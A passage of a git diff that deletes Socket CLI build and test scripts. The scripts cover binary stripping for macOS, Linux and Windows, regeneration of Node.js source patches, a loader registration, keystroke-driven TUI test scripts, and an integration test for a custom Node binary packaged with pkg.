['--strip-all', binaryPath]) - } - - // Phase 3: Remove unnecessary Mach-O sections. - logger.log('\n Phase 3: Remove unnecessary sections') - // Note: Most Mach-O section removal requires specialized tools. 
- // strip and llvm-strip already handle this well. - - const afterSize = await getFileSizeMB(binaryPath) - const savings = ((beforeSize - afterSize) / beforeSize * 100).toFixed(1) - logger.log(`\n After: ${afterSize} MB (${savings}% reduction)`) - - // Re-sign binary if on macOS ARM64 (required). - if (osPlatform() === 'darwin' && process.arch === 'arm64') { - logger.log('\n Phase 4: Code signing') - exec('codesign', ['--force', '--sign', '-', binaryPath]) - } - - return { before: parseFloat(beforeSize), after: parseFloat(afterSize), savings: parseFloat(savings) } -} - -/** - * Optimize binary for Linux. - */ -async function optimizeLinux(binaryPath) { - logger.log('\n🐧 Optimizing Linux binary...') - - const beforeSize = await getFileSizeMB(binaryPath) - logger.log(` Before: ${beforeSize} MB`) - - // Phase 1: Aggressive stripping. - logger.log('\n Phase 1: Aggressive stripping') - exec('strip', ['--strip-all', binaryPath]) - - // Phase 2: Remove unnecessary ELF sections. - if (commandExists('objcopy')) { - logger.log('\n Phase 2: Remove unnecessary ELF sections') - const sections = [ - '.note.ABI-tag', - '.note.gnu.build-id', - '.comment', - '.gnu.version', - ] - - for (const section of sections) { - exec('objcopy', [`--remove-section=${section}`, binaryPath]) - } - } - - // Phase 3: Super strip (sstrip) if available. - if (commandExists('sstrip')) { - logger.log('\n Phase 3: Super strip (removes section headers)') - exec('sstrip', [binaryPath]) - } - - const afterSize = await getFileSizeMB(binaryPath) - const savings = ((beforeSize - afterSize) / beforeSize * 100).toFixed(1) - logger.log(`\n After: ${afterSize} MB (${savings}% reduction)`) - - return { before: parseFloat(beforeSize), after: parseFloat(afterSize), savings: parseFloat(savings) } -} - -/** - * Optimize binary for Windows. 
- */ -async function optimizeWindows(binaryPath) { - logger.log('\n🪟 Optimizing Windows binary...') - - const beforeSize = await getFileSizeMB(binaryPath) - logger.log(` Before: ${beforeSize} MB`) - - // Phase 1: Aggressive stripping. - // Note: Windows binaries are typically cross-compiled on Linux/macOS with mingw. - logger.log('\n Phase 1: Aggressive stripping') - - // Try mingw-strip for Windows binaries. - if (commandExists('x86_64-w64-mingw32-strip')) { - exec('x86_64-w64-mingw32-strip', ['--strip-all', binaryPath]) - } else if (commandExists('strip')) { - exec('strip', ['--strip-all', binaryPath]) - } - - const afterSize = await getFileSizeMB(binaryPath) - const savings = ((beforeSize - afterSize) / beforeSize * 100).toFixed(1) - logger.log(`\n After: ${afterSize} MB (${savings}% reduction)`) - - return { before: parseFloat(beforeSize), after: parseFloat(afterSize), savings: parseFloat(savings) } -} - -/** - * Optimize a single binary. - */ -async function optimizeBinary(binaryPath, platform) { - // Detect platform from binary path if not specified. - if (!platform) { - if (binaryPath.includes('darwin')) { - platform = 'darwin' - } else if (binaryPath.includes('linux') || binaryPath.includes('alpine')) { - platform = 'linux' - } else if (binaryPath.includes('win32') || binaryPath.endsWith('.exe')) { - platform = 'win32' - } else { - platform = osPlatform() - } - } - - logger.log(`\n📦 Optimizing: ${path.basename(binaryPath)}`) - logger.log(` Platform: ${platform}`) - - // Check binary exists. - if (!existsSync(binaryPath)) { - logger.error(`\n${colors.red('✗')} Binary not found: ${binaryPath}`) - return null - } - - // Apply platform-specific optimizations. 
- let result - switch (platform) { - case 'darwin': - result = await optimizeDarwin(binaryPath) - break - case 'linux': - case 'alpine': - result = await optimizeLinux(binaryPath) - break - case 'win32': - result = await optimizeWindows(binaryPath) - break - default: - logger.error(`\n${colors.red('✗')} Unsupported platform: ${platform}`) - return null - } - - logger.log(`\n${colors.green('✓')} Optimization complete!`) - return result -} - -/** - * Find and optimize all platform binaries. - */ -async function optimizeAllBinaries() { - logger.log('🔍 Finding all platform binaries...\n') - - const packagesDir = path.join(rootDir, 'packages') - const binaryPatterns = [ - 'socketbin-cli-*/bin/socket', - 'socketbin-cli-*/bin/socket.exe', - ] - - const binaries = [] - for (const pattern of binaryPatterns) { - const [dir, file] = pattern.split('/') - const packages = await fs.readdir(packagesDir) - - for (const pkg of packages) { - if (pkg.startsWith('socketbin-cli-')) { - const binPath = path.join(packagesDir, pkg, 'bin', file.replace('*', '')) - if (existsSync(binPath)) { - const stats = await fs.stat(binPath) - // Only process actual binaries (>1MB), not placeholders. - if (stats.size > 1024 * 1024) { - binaries.push(binPath) - } - } - } - } - } - - if (binaries.length === 0) { - logger.log(`${colors.yellow('⚠')} No binaries found to optimize`) - logger.log(' Run build first: pnpm run build:platforms') - return [] - } - - logger.log(`Found ${binaries.length} binaries to optimize:\n`) - binaries.forEach(b => logger.log(` - ${path.relative(rootDir, b)}`)) - - const results = [] - for (const binaryPath of binaries) { - const result = await optimizeBinary(binaryPath, null) - if (result) { - results.push({ path: binaryPath, ...result }) - } - } - - return results -} - -/** - * Main entry point. 
- */ -async function main() { - logger.log('⚡ Socket CLI Binary Size Optimizer') - logger.log('=' .repeat(50)) - - let results = [] - - if (optimizeAll) { - results = await optimizeAllBinaries() - } else if (binaryPath) { - const result = await optimizeBinary(binaryPath, targetPlatform) - if (result) { - results.push({ path: binaryPath, ...result }) - } - } else { - logger.error(`\n${colors.red('✗')} Error: No binary specified`) - logger.log('\nUsage:') - logger.log(' node scripts/optimize-binary-size.mjs [--platform=]') - logger.log(' node scripts/optimize-binary-size.mjs --all') - logger.log('\nExamples:') - logger.log(' node scripts/optimize-binary-size.mjs packages/socketbin-cli-darwin-arm64/bin/socket') - logger.log(' node scripts/optimize-binary-size.mjs build/out/Release/node --platform=linux') - logger.log(' node scripts/optimize-binary-size.mjs --all') - process.exit(1) - } - - // Summary. - if (results.length > 0) { - logger.log('\n' + '='.repeat(50)) - logger.log('📊 Optimization Summary') - logger.log('='.repeat(50)) - logger.log('') - - let totalBefore = 0 - let totalAfter = 0 - - for (const { path: binPath, before, after, savings } of results) { - totalBefore += before - totalAfter += after - logger.log(` ${path.basename(binPath)}:`) - logger.log(` Before: ${before.toFixed(2)} MB`) - logger.log(` After: ${after.toFixed(2)} MB`) - logger.log(` Saved: ${(before - after).toFixed(2)} MB (${savings.toFixed(1)}%)`) - logger.log('') - } - - if (results.length > 1) { - const totalSavings = ((totalBefore - totalAfter) / totalBefore * 100).toFixed(1) - logger.log(' Total:') - logger.log(` Before: ${totalBefore.toFixed(2)} MB`) - logger.log(` After: ${totalAfter.toFixed(2)} MB`) - logger.log(` Saved: ${(totalBefore - totalAfter).toFixed(2)} MB (${totalSavings}%)`) - } - - logger.log(`\n${colors.green('✓')} All optimizations complete!`) - } -} - -main().catch(error => { - logger.error(`\n${colors.red('✗')} Optimization failed:`, error.message) - process.exit(1) 
-}) diff --git a/scripts/regenerate-node-patches.mjs b/scripts/regenerate-node-patches.mjs deleted file mode 100644 index 1ca026734..000000000 --- a/scripts/regenerate-node-patches.mjs +++ /dev/null @@ -1,284 +0,0 @@ -/** - * @fileoverview Regenerate Socket Node.js patches for new Node.js versions - * - * This script automates the process of regenerating patches when Node.js - * version is bumped (e.g., from v24.9.0 to v24.10.0). - * - * Process: - * 1. Clone fresh Node.js at specified version - * 2. Apply Socket modifications - * 3. Generate patches from diff - * - * Usage: - * node scripts/regenerate-node-patches.mjs --version v24.10.0 - */ - -import { existsSync } from 'node:fs' -import { mkdir, readFile, rm, writeFile } from 'node:fs/promises' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' - -import { spawn } from '@socketsecurity/lib/spawn' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __filename = fileURLToPath(import.meta.url) -const __dirname = dirname(__filename) - -// Parse arguments -const args = process.argv.slice(2) -const versionArg = args.find(arg => arg.startsWith('--version=')) -if (!versionArg) { - logger.error(`${colors.red('✗')} Missing --version argument`) - logger.error( - 'Usage: node scripts/regenerate-node-patches.mjs --version=v24.10.0', - ) - process.exit(1) -} - -const NODE_VERSION = versionArg.split('=')[1] -if (!NODE_VERSION.startsWith('v')) { - logger.error(`${colors.red('✗')} Version must start with "v" (e.g., v24.10.0)`) - process.exit(1) -} - -const ROOT_DIR = join(__dirname, '..') -const WORK_DIR = join(ROOT_DIR, '.patch-gen') -const NODE_DIR = join(WORK_DIR, 'node') -const OUTPUT_DIR = join(ROOT_DIR, 'build', 'patches') - -/** - * Execute a command - */ -async function exec(command, args = [], options = {}) { - const { cwd = process.cwd(), stdio = 'inherit' } = options - - logger.log(`$ 
${command} ${args.join(' ')}`) - - const result = await spawn(command, args, { - cwd, - stdio, - shell: false, - }) - - if (result.code !== 0) { - throw new Error(`Command failed with exit code ${result.code}`) - } - - return result -} - -/** - * Execute and capture output - */ -async function execCapture(command, args = [], options = {}) { - const { cwd = process.cwd() } = options - - const result = await spawn(command, args, { - cwd, - stdio: 'pipe', - shell: false, - }) - - if (result.code !== 0) { - throw new Error( - `Command failed with exit code ${result.code}: ${result.stderr}`, - ) - } - - return result.stdout.trim() -} - -/** - * Apply Socket modifications - */ -async function applySocketModifications() { - logger.log('🔧 Applying Socket modifications...') - - // Fix 1: V8 include paths - const v8Fixes = [ - { - file: 'deps/v8/src/ast/ast-value-factory.h', - from: '#include "src/base/hashmap.h"', - to: '#include "base/hashmap.h"', - }, - { - file: 'deps/v8/src/heap/new-spaces-inl.h', - from: '#include "src/heap/spaces-inl.h"', - to: '#include "heap/spaces-inl.h"', - }, - { - file: 'deps/v8/src/heap/factory-inl.h', - from: '#include "src/heap/factory-base-inl.h"', - to: '#include "heap/factory-base-inl.h"', - }, - { - file: 'deps/v8/src/objects/js-objects-inl.h', - from: '#include "src/objects/hash-table-inl.h"', - to: '#include "objects/hash-table-inl.h"', - }, - { - file: 'deps/v8/src/heap/cppgc/heap-page.h', - from: '#include "src/base/iterator.h"', - to: '#include "base/iterator.h"', - }, - ] - - for (const { file, from, to } of v8Fixes) { - const filePath = join(NODE_DIR, file) - try { - let content = await readFile(filePath, 'utf8') - if (content.includes(from)) { - content = content.replace(from, to) - await writeFile(filePath, content, 'utf8') - logger.log(` ✓ Fixed: ${file}`) - } - } catch (e) { - logger.warn(` ${colors.yellow('⚠')} Skipped ${file}: ${e.message}`) - } - } - - // Fix 2: Enable SEA for pkg binaries - const seaFile = join(NODE_DIR, 
'lib', 'sea.js') - try { - let content = await readFile(seaFile, 'utf8') - const oldImport = - "const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea');" - const newImport = `const isSea = () => true; -const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea');` - - if (content.includes(oldImport)) { - content = content.replace(oldImport, newImport) - await writeFile(seaFile, content, 'utf8') - logger.log(' ✓ Modified: lib/sea.js') - } - } catch (e) { - logger.warn(` ${colors.yellow('⚠')} Skipped lib/sea.js: ${e.message}`) - } - - logger.log(`${colors.green('✓')} Socket modifications applied`) - logger.log('') -} - -/** - * Generate patch file - */ -async function generatePatch(name, description) { - logger.log(`📝 Generating ${name} patch...`) - - const diff = await execCapture('git', ['diff', 'HEAD'], { cwd: NODE_DIR }) - - if (!diff) { - logger.log(' ℹ️ No changes to generate patch') - return null - } - - const header = `# ${description} -# -# Author: Socket CLI -# Date: ${new Date().toISOString().split('T')[0]} -# Node version: ${NODE_VERSION} - -` - - const patchContent = header + diff - const patchFile = join( - OUTPUT_DIR, - `${name}-${NODE_VERSION.replace(/\./g, '-')}.patch`, - ) - - await writeFile(patchFile, patchContent) - logger.log(`${colors.green('✓')} Generated: ${patchFile}`) - - return patchFile -} - -/** - * Main function - */ -async function main() { - logger.log(`🔨 Regenerating Socket patches for Node.js ${NODE_VERSION}`) - logger.log('') - - // Clean up old work directory - if (existsSync(WORK_DIR)) { - logger.log('🧹 Cleaning up old work directory...') - await rm(WORK_DIR, { recursive: true, force: true }) - } - - await mkdir(WORK_DIR, { recursive: true }) - await mkdir(OUTPUT_DIR, { recursive: true }) - - // Step 1: Clone Node.js - logger.log(`📥 Cloning Node.js ${NODE_VERSION}...`) - await exec( - 'git', - [ - 'clone', - '--depth', - '1', - '--branch', - 
NODE_VERSION, - 'https://github.com/nodejs/node.git', - 'node', - ], - { cwd: WORK_DIR }, - ) - logger.log('') - - // Step 2: Apply Socket modifications - await applySocketModifications() - - // Step 5: Generate patches - logger.log('📝 Generating patch files...') - logger.log('') - - const patches = [] - - // Generate combined patch - const combinedPatch = await generatePatch( - 'socket-node-modifications', - 'Socket CLI modifications for Node.js\n' + - '#\n' + - '# Includes:\n' + - '# - Fix V8 include paths\n' + - '# - Enable SEA detection for pkg binaries', - ) - - if (combinedPatch) { - patches.push(combinedPatch) - } - - logger.log('') - logger.log('🎉 Patch regeneration complete!') - logger.log('') - - if (patches.length > 0) { - logger.log('Generated patches:') - for (const patch of patches) { - logger.log(` - ${patch}`) - } - logger.log('') - logger.log('📝 Next steps:') - logger.log(' 1. Review the generated patches') - logger.log( - ' 2. Update packages/node-smol-builder/scripts/build.mjs to use new patch files', - ) - logger.log(' 3. Update SOCKET_PATCHES array with new filenames') - logger.log(' 4. Test the build') - } else { - logger.log(`${colors.yellow('⚠')} No patches were generated (no changes detected)`) - } - - logger.log('') - logger.log('🧹 Cleanup:') - logger.log(` rm -rf ${WORK_DIR}`) -} - -// Run main function -main().catch(error => { - logger.error(`${colors.red('✗')} Patch regeneration failed:`, error.message) - process.exitCode = 1 -}) diff --git a/scripts/register.mjs b/scripts/register.mjs deleted file mode 100644 index 4d4e0d700..000000000 --- a/scripts/register.mjs +++ /dev/null @@ -1,21 +0,0 @@ -/** - * Module loader registration for Node.js --import flag. - * - * Registers our custom alias loader for @socketsecurity/* package imports. - * This replaces the deprecated --loader flag with the new register() API. 
- * - * Usage: - * node --import=./scripts/register.mjs script.mjs - * - * Compatible with Node.js 18.19+, 20.6+, and 22+ - */ - -import { register } from 'node:module' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) - -// Register the alias loader using absolute path. - -register(path.join(__dirname, 'utils', 'alias-loader.mjs'), import.meta.url) diff --git a/scripts/test-recording.sh b/scripts/test-recording.sh deleted file mode 100644 index 69e7eae5c..000000000 --- a/scripts/test-recording.sh +++ /dev/null @@ -1,41 +0,0 @@ -#!/bin/bash -# Script to record terminal session testing the TUI demo. -# This will create a typescript file showing the exact behavior. - -SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" - -echo "=== Starting TUI Demo Test Recording ===" -echo "This will record:" -echo "1. Initial state (1 line textarea)" -echo "2. Pressing Ctrl+N multiple times to expand" -echo "3. Pressing Enter to collapse" -echo "4. Repeating the cycle to observe garbling" -echo "" -echo "Recording will be saved to: /tmp/tui-test-recording.txt" -echo "" -echo "Starting in 3 seconds..." -sleep 3 - -# Use script to record the session. -script -q /tmp/tui-test-recording.txt << EOF -# Run the demo. -node "$SCRIPT_DIR/demo-final-tui.mjs" - -# The demo will start... 
-# I'll send keystrokes programmatically to simulate the test: -# - Wait 2 seconds -# - Send Ctrl+N (expand) 5 times -# - Wait 1 second -# - Send Enter (collapse) -# - Wait 1 second -# - Send Ctrl+N 5 times again -# - Wait 1 second -# - Send Enter -# - Wait 1 second -# - Send Ctrl+C to exit - -EOF - -echo "" -echo "=== Recording complete ===" -echo "View with: cat /tmp/tui-test-recording.txt" diff --git a/scripts/test-smol-integration.mjs b/scripts/test-smol-integration.mjs deleted file mode 100644 index 8845d91c4..000000000 --- a/scripts/test-smol-integration.mjs +++ /dev/null @@ -1,329 +0,0 @@ -/** - * @fileoverview End-to-end integration test for smol Node.js binary - * - * This script performs a complete end-to-end test: - * 1. Builds Socket CLI with the custom Node.js binary - * 2. Creates a pkg executable - * 3. Tests the executable works correctly - * 4. Verifies SEA detection - * 5. Cleans up test artifacts - * - * Usage: - * node scripts/test-smol-integration.mjs [--node-version v24.10.0] - */ - -import { existsSync } from 'node:fs' -import { mkdir, rm, writeFile } from 'node:fs/promises' -import { tmpdir } from 'node:os' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' - -import { spawn } from '@socketsecurity/lib/spawn' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __filename = fileURLToPath(import.meta.url) -const __dirname = dirname(__filename) - -// Parse arguments. -const args = process.argv.slice(2) -const versionArg = args.find(arg => arg.startsWith('--node-version=')) -const NODE_VERSION = versionArg ? versionArg.split('=')[1] : 'v24.10.0' - -const ROOT_DIR = join(__dirname, '..') -const TEST_DIR = join(tmpdir(), `socket-cli-integration-test-${Date.now()}`) - -/** - * Execute a command and capture output. 
- */ -async function exec(command, args = [], options = {}) { - const { cwd = process.cwd(), env = process.env } = options - - logger.log(`$ ${command} ${args.join(' ')}`) - - const result = await spawn(command, args, { - cwd, - env, - stdio: 'pipe', - shell: false, - }) - - return { - code: result.code, - stdout: result.stdout.trim(), - stderr: result.stderr.trim(), - } -} - -/** - * Main test function. - */ -async function main() { - logger.log('') - logger.log('🧪 Socket CLI - Smol Integration Test') - logger.log(` Testing Node.js ${NODE_VERSION} binary with pkg`) - logger.log('') - - let testsFailed = 0 - const testResults = [] - - try { - // Test 1: Verify custom Node.js binary exists in cache. - logger.log('━'.repeat(60)) - logger.log('TEST 1: Custom Node.js Binary in Cache') - logger.log('━'.repeat(60)) - logger.log('') - - const platform = process.platform - const arch = process.arch - const isMacOS = platform === 'darwin' - const targetName = `built-${NODE_VERSION}-${platform}-${arch}${isMacOS && arch === 'arm64' ? '-signed' : ''}` - const binaryPath = join( - process.env.HOME || process.env.USERPROFILE, - '.pkg-cache', - 'v3.5', - targetName, - ) - - if (!existsSync(binaryPath)) { - logger.error(`${colors.red('✗')} Custom Node.js binary not found: ${binaryPath}`) - logger.error(' Run: node packages/node-smol-builder/scripts/build.mjs') - testsFailed++ - testResults.push({ name: 'Binary in cache', passed: false }) - } else { - logger.log(`${colors.green('✓')} Custom Node.js binary found: ${binaryPath}`) - testResults.push({ name: 'Binary in cache', passed: true }) - } - - logger.log('') - - // Test 2: Build Socket CLI. 
- logger.log('━'.repeat(60)) - logger.log('TEST 2: Build Socket CLI') - logger.log('━'.repeat(60)) - logger.log('') - - logger.log('Building Socket CLI distribution...') - const buildResult = await exec('pnpm', ['run', 'build:cli'], { - cwd: ROOT_DIR, - }) - - if (buildResult.code !== 0) { - logger.error(`${colors.red('✗')} Socket CLI build failed`) - logger.error(buildResult.stderr) - testsFailed++ - testResults.push({ name: 'Build Socket CLI', passed: false }) - throw new Error('Socket CLI build failed') - } - - logger.log(`${colors.green('✓')} Socket CLI built successfully`) - testResults.push({ name: 'Build Socket CLI', passed: true }) - logger.log('') - - // Test 3: Create test directory. - logger.log('━'.repeat(60)) - logger.log('TEST 3: Setup Test Environment') - logger.log('━'.repeat(60)) - logger.log('') - - await mkdir(TEST_DIR, { recursive: true }) - logger.log(`Created test directory: ${TEST_DIR}`) - - // Create minimal test package.json. - const testPackageJson = { - name: 'socket-cli-test', - version: '1.0.0', - main: 'test-cli.js', - bin: { - 'socket-test': 'test-cli.js', - }, - } - - await writeFile( - join(TEST_DIR, 'package.json'), - JSON.stringify(testPackageJson, null, 2), - ) - - // Create test CLI script. - const testCliScript = `#!/usr/bin/env node -const sea = require('node:sea'); -const fs = require('node:fs'); -const path = require('node:path'); - -// Test 1: Basic execution. -logger.log('Test executable running!'); - -// Test 2: SEA detection. -const isSea = sea.isSea(); -logger.log('SEA detection:', isSea ? 'YES' : 'NO'); - -// Test 3: File system access. -const cwd = process.cwd(); -logger.log('CWD:', cwd); - -// Test 4: Module loading. -const pathModule = require('node:path'); -logger.log('Path module:', pathModule ? 'OK' : 'FAIL'); - -// Exit with appropriate code. 
-if (isSea) { - logger.log(`${colors.green('✓')} All tests passed`); - process.exit(0); -} else { - logger.error(`${colors.red('✗')} SEA detection failed`); - process.exit(1); -} -` - - await writeFile(join(TEST_DIR, 'test-cli.js'), testCliScript) - logger.log(`${colors.green('✓')} Test environment setup complete`) - testResults.push({ name: 'Setup test environment', passed: true }) - logger.log('') - - // Test 4: Create pkg executable. - logger.log('━'.repeat(60)) - logger.log('TEST 4: Create pkg Executable') - logger.log('━'.repeat(60)) - logger.log('') - - logger.log('Running pkg to create executable...') - logger.log(`Using custom Node.js binary: ${targetName}`) - logger.log('') - - const pkgResult = await exec( - 'pnpm', - [ - 'exec', - 'pkg', - '.', - '--targets', - `node24-${platform}-${arch}`, - '--output', - 'socket-test', - ], - { - cwd: TEST_DIR, - }, - ) - - if (pkgResult.code !== 0) { - logger.error(`${colors.red('✗')} pkg failed to create executable`) - logger.error(pkgResult.stderr) - testsFailed++ - testResults.push({ name: 'Create pkg executable', passed: false }) - throw new Error('pkg failed') - } - - const executablePath = join( - TEST_DIR, - `socket-test${platform === 'win32' ? '.exe' : ''}`, - ) - if (!existsSync(executablePath)) { - logger.error(`${colors.red('✗')} Executable not created: ${executablePath}`) - testsFailed++ - testResults.push({ name: 'Create pkg executable', passed: false }) - throw new Error('Executable not created') - } - - logger.log(`${colors.green('✓')} Executable created: ${executablePath}`) - testResults.push({ name: 'Create pkg executable', passed: true }) - logger.log('') - - // Test 5: Run the executable. 
- logger.log('━'.repeat(60)) - logger.log('TEST 5: Run and Verify Executable') - logger.log('━'.repeat(60)) - logger.log('') - - logger.log('Executing test binary...') - logger.log('') - - const execResult = await exec(executablePath, [], { - cwd: TEST_DIR, - }) - - logger.log('Output:') - logger.log(execResult.stdout) - logger.log('') - - if (execResult.code !== 0) { - logger.error(`${colors.red('✗')} Executable failed with exit code:`, execResult.code) - logger.error('STDERR:', execResult.stderr) - testsFailed++ - testResults.push({ name: 'Run executable', passed: false }) - testResults.push({ name: 'SEA detection', passed: false }) - } else { - logger.log(`${colors.green('✓')} Executable ran successfully`) - testResults.push({ name: 'Run executable', passed: true }) - - // Verify SEA detection. - if (execResult.stdout.includes('SEA detection: YES')) { - logger.log(`${colors.green('✓')} SEA detection working correctly`) - testResults.push({ name: 'SEA detection', passed: true }) - } else { - logger.error(`${colors.red('✗')} SEA detection failed (reported as NO)`) - testsFailed++ - testResults.push({ name: 'SEA detection', passed: false }) - } - } - - logger.log('') - - // Summary. - logger.log('━'.repeat(60)) - logger.log('TEST SUMMARY') - logger.log('━'.repeat(60)) - logger.log('') - - for (const { name, passed } of testResults) { - logger.log(`${passed ? 
`${colors.green('✓')}` : `${colors.red('✗')}`} ${name}`) - } - - logger.log('') - - if (testsFailed === 0) { - logger.log('🎉 ALL TESTS PASSED') - logger.log('') - logger.log('Your custom Node.js binary is working correctly with pkg!') - logger.log('') - } else { - logger.error(`${colors.red('✗')} ${testsFailed} TEST(S) FAILED`) - logger.error() - logger.error('The custom Node.js binary has issues.') - logger.error('Review the errors above and rebuild:') - logger.error(' node packages/node-smol-builder/scripts/build.mjs --clean') - logger.error() - process.exitCode = 1 - } - logger.error() - } catch (e) { - logger.error(`${colors.red('✗')} Integration test failed:`, e.message) - logger.error() - process.exitCode = 1 - } finally { - // Cleanup. - logger.log('━'.repeat(60)) - logger.log('CLEANUP') - logger.log('━'.repeat(60)) - logger.log('') - - logger.log(`Removing test directory: ${TEST_DIR}`) - try { - await rm(TEST_DIR, { recursive: true, force: true }) - logger.log(`${colors.green('✓')} Test directory cleaned up`) - } catch (e) { - logger.warn(`${colors.yellow('⚠')} Could not clean up test directory: ${e.message}`) - logger.warn(` Manually remove: rm -rf ${TEST_DIR}`) - } - - logger.log('') - } -} - -// Run main function. -main().catch(error => { - logger.error(`${colors.red('✗')} Integration test crashed:`, error.message) - process.exitCode = 1 -}) diff --git a/scripts/test-tui-automated.sh b/scripts/test-tui-automated.sh deleted file mode 100755 index e73e41b39..000000000 --- a/scripts/test-tui-automated.sh +++ /dev/null @@ -1,75 +0,0 @@ -#!/bin/bash -# Automated TUI test script that can be recorded. -# This sends keystrokes to the demo to demonstrate the fix. - -echo "=== TUI Demo Test - Automated ===" -echo "" -echo "This will demonstrate:" -echo " 1. Initial state (1 line textarea)" -echo " 2. Expand textarea (Ctrl+N x5)" -echo " 3. Collapse textarea (Enter)" -echo " 4. Repeat cycle" -echo "" -echo "Starting demo in 2 seconds..." 
-sleep 2 - -# Create a FIFO to send commands. -FIFO="/tmp/tui-test-fifo-$$" -mkfifo "$FIFO" - -# Start the demo in the background, reading from the FIFO. -node scripts/load.mjs demo-final-tui < "$FIFO" & -DEMO_PID=$! - -# Give it time to initialize. -sleep 2 - -# Function to send keys to the FIFO. -send_key() { - printf "$1" > "$FIFO" -} - -# Test sequence. -echo "[TEST] Expanding textarea with Ctrl+N (5 times)..." -for i in {1..5}; do - send_key $'\x0E' # Ctrl+N - sleep 0.3 -done - -sleep 1 -echo "[TEST] Collapsing with Enter..." -send_key $'\r' # Enter -sleep 1 - -echo "[TEST] Expanding again with Ctrl+N (5 times)..." -for i in {1..5}; do - send_key $'\x0E' # Ctrl+N - sleep 0.3 -done - -sleep 1 -echo "[TEST] Collapsing with Enter..." -send_key $'\r' # Enter -sleep 1 - -echo "[TEST] One more expand cycle..." -for i in {1..5}; do - send_key $'\x0E' # Ctrl+N - sleep 0.3 -done - -sleep 1 -echo "[TEST] Final collapse..." -send_key $'\r' # Enter -sleep 2 - -echo "[TEST] Exiting with q..." -send_key 'q' -sleep 1 - -# Cleanup. -rm -f "$FIFO" -wait "$DEMO_PID" 2>/dev/null || true - -echo "" -echo "=== Test Complete ===" diff --git a/scripts/test-tui-expect.exp b/scripts/test-tui-expect.exp deleted file mode 100755 index fca85438f..000000000 --- a/scripts/test-tui-expect.exp +++ /dev/null @@ -1,95 +0,0 @@ -#!/usr/bin/expect -f -# Expect script to interact with the TUI demo and verify the fix. - -set timeout 30 - -# Start the demo. -spawn node scripts/load.mjs demo-final-tui - -# Wait for initialization. -sleep 2 - -puts "\n=== TEST START ===" -puts "Initial state: 1 line textarea" -sleep 1 - -# Cycle 1: Expand. -puts "\n\[TEST\] Expanding textarea (Ctrl+N x5)..." -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 - -puts "\[TEST\] Textarea expanded to 6 lines" -sleep 1 - -# Cycle 1: Collapse. -puts "\n\[TEST\] Collapsing textarea (Enter)..." 
-send "\r" -sleep 1 - -puts "\[TEST\] Textarea collapsed back to 1 line" -puts "\[TEST\] Checking for garbling artifacts..." -sleep 1 - -# Cycle 2: Expand again. -puts "\n\[TEST\] Second expand cycle (Ctrl+N x5)..." -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 - -sleep 1 - -# Cycle 2: Collapse. -puts "\n\[TEST\] Second collapse (Enter)..." -send "\r" -sleep 1 - -puts "\[TEST\] Checking for jumping garbling..." -sleep 1 - -# Cycle 3: One more time to be sure. -puts "\n\[TEST\] Third expand cycle (Ctrl+N x7)..." -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 - -sleep 1 - -puts "\n\[TEST\] Third collapse (Enter)..." -send "\r" -sleep 2 - -puts "\n=== TEST COMPLETE ===" -puts "If no garbling was visible, the fix is working!" -sleep 1 - -# Exit. -puts "\n\[TEST\] Exiting (q)..." -send "q" - -expect eof diff --git a/scripts/test-tui-with-snapshots.exp b/scripts/test-tui-with-snapshots.exp deleted file mode 100755 index 7e241d704..000000000 --- a/scripts/test-tui-with-snapshots.exp +++ /dev/null @@ -1,83 +0,0 @@ -#!/usr/bin/expect -f -# Test script that takes snapshots at key moments. - -set timeout 30 -log_user 1 - -# Start the demo. -spawn node scripts/load.mjs demo-final-tui - -# Wait for initialization. -sleep 3 - -puts "\n\[SNAPSHOT 1\] Initial state - 1 line textarea" -# Take snapshot. -send "" -expect * -sleep 1 - -# Expand. -puts "\n\[ACTION\] Expanding with Ctrl+N x5..." -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 1 - -puts "\n\[SNAPSHOT 2\] After expansion - 6 line textarea" -send "" -expect * -sleep 1 - -# Collapse. -puts "\n\[ACTION\] Collapsing with Enter..." -send "\r" -sleep 2 - -puts "\n\[SNAPSHOT 3\] After collapse - checking for garbling" -send "" -expect * -sleep 1 - -# Expand again. 
-puts "\n\[ACTION\] Expanding again with Ctrl+N x5..." -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 1 - -puts "\n\[SNAPSHOT 4\] Second expansion" -send "" -expect * -sleep 1 - -# Collapse again. -puts "\n\[ACTION\] Collapsing again with Enter..." -send "\r" -sleep 2 - -puts "\n\[SNAPSHOT 5\] Second collapse - checking for jumping garbling" -send "" -expect * -sleep 2 - -puts "\n\n=== TEST SUMMARY ===" -puts "The test completed 2 expand/collapse cycles." -puts "If no garbling was visible in the snapshots, the fix is working!" - -# Exit. -send "q" -sleep 1 - -expect eof diff --git a/scripts/wasm/benchmark-build.mjs b/scripts/wasm/benchmark-build.mjs deleted file mode 100644 index 67cc5c25e..000000000 --- a/scripts/wasm/benchmark-build.mjs +++ /dev/null @@ -1,225 +0,0 @@ -/** - * Benchmark WASM Build Performance - * - * Measures and compares build times for dev vs production builds. - * Helps validate optimization improvements. - * - * USAGE: - * node scripts/wasm/benchmark-build.mjs - * node scripts/wasm/benchmark-build.mjs --dev-only - * node scripts/wasm/benchmark-build.mjs --prod-only - */ 